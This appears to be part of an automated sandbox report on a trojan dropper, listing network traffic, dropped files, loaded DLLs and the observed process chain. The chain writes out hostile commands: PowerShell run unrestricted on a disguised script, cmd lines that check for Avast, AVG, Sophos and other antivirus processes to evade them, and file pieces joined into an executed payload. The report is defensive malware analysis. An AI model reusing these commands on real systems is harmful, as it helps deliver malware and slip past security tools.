Source: SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, SolPen.exe, 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmp, Solution.3.dr, Puts.com.4.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Puts.com.4.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, SolPen.exe, 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmp, Solution.3.dr, Puts.com.4.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976

Source: unknown	HTTPS traffic detected: 47.79.48.182:443 -> 192.168.2.11:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49974 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49980 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

Code function: 3_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

3_2_004050CD

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

Code function: 3_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

3_2_004044A5

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

Code function: 3_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

3_2_00403883

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	File created: C:\Windows\AxisNewspaper	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	File created: C:\Windows\BabiesAllied	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	File created: C:\Windows\JoinedDiscussing	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	File created: C:\Windows\DamSpringer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	File created: C:\Windows\ExcellentVi	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	File created: C:\Windows\FijiPosting	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	File created: C:\Windows\ProvideGuatemala	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	File created: C:\Windows\OffensiveWeights	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Code function: 3_2_0040497C	3_2_0040497C
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Code function: 3_2_00406ED2	3_2_00406ED2
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Code function: 3_2_004074BB	3_2_004074BB

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\701961\Puts.com 05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

Code function: String function: 004062A3 appears 58 times

Source: classification engine

Classification label: mal100.troj.spyw.evad.winPS1@25/20@3/2

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

3_2_004044A5

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

Code function: 3_2_004024FB CoCreateInstance,

3_2_004024FB

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Extracted3

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44amoytp.cot.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\pennicle.txt.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe "C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe"
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Battle Battle.cmd & Battle.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 701961
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CigaretteSmallPlatesCalgary" Tits
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Relationship + ..\Playing + ..\Closely + ..\Reducing + ..\Inventory + ..\Kingdom + ..\Suppose j
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\701961\Puts.com Puts.com j
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe "C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Battle Battle.cmd & Battle.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 701961	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CigaretteSmallPlatesCalgary" Tits	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Relationship + ..\Playing + ..\Closely + ..\Reducing + ..\Inventory + ..\Kingdom + ..\Suppose j	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\701961\Puts.com Puts.com j	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Section loaded: msasn1.dll	Jump to behavior
